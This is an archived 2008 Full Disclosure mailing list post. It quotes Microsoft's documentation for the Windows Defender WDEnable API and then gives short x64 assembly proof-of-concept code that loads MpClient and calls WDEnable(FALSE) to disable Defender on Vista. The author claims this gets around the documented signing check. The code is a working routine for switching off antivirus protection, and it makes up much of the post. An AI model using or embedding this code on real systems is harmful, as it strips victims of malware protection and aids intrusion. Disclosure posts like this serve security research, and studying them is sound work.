Full Disclosure mailing list archives

[Wired Security/EOF] Disable Windows Defender (Vista) PoC code

From: <skyout.fd () wired-security net>
Date: Wed, 14 May 2008 18:05:17 +0200


Hey guys,

my friend Izee from the EOF-Project(.net) team has coded a
simple PoC code, that demonstrates how to disable the Windows
Defender on Vista (tested with and without SPs on x86/x64)
using its own API made for it.

The API has the following structure:

--- SNIP ---
HRESULT WDEnable(
        BOOL fEnable
);
---

Something about the parameter(s):

--- SNIP ---
Parameters

        fEnable
                [in] Windows Defender status that the calling
                application wants to set. TRUE enables Windows
                Defender. FALSE disables Windows Defender. 
---

Now the interesting thing, what Microsoft says about the security
of this API:

--- SNIP ---
Remarks

        The application calling this function must run with
        administrator permissions on the local computer. In
        Windows Vista, the user is prompted for administrator
        permission when the application is running with lower
        privileges. Windows Defender also validates proper signing
        of the calling process (and all the loaded modules) before
        allowing the calling application to change the status. If the
        calling process image (or any loaded modules) is not signed
        or is flagged as a threat by the Windows Defender signature,
        then the call fails with the appropriate error code.
---

And here the code from Izee/EOF, that shows, that this is a lie and nothing
more. The users get fooled...

--- SNIP ---
extrn   LoadLibraryA   :proc
        extrn   GetProcAddress :proc
        extrn   ExitProcess    :proc

 .data

        l db '\Program Files\Windows Defender\MpClient',0
        p db 'WDEnable',0

 .code

 eof proc
 push rsp

        lea  rcx, l
        call LoadLibraryA

        lea  rdx, p
        mov  rcx, rax
        call GetProcAddress

        xor  rcx, rcx ;Turn Windows Defender off
        call rax

        call ExitProcess

 eof endp
 end
---

News: http://wired-security.net/archive/2008/may/index.php#07_2_052008

Sincerely,
SkyOut/Wired Security in corporation with Izee/EOF

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

[Wired Security/EOF] Disable Windows Defender (Vista) PoC code skyout.fd (May 14)
- Re: [Wired Security/EOF] Disable Windows Defender (Vista) PoC code Peter Ferrie (May 14)
  - Re: [Wired Security/EOF] Disable Windows Defender (Vista) PoC code Fredrick Diggle (May 14)
  - Re: [Wired Security/EOF] Disable Windows Defender(Vista) PoC code skyout.fd (May 15)
    - Re: [Wired Security/EOF] Disable Windows Defender(Vista) PoC code Fredrick Diggle (May 16)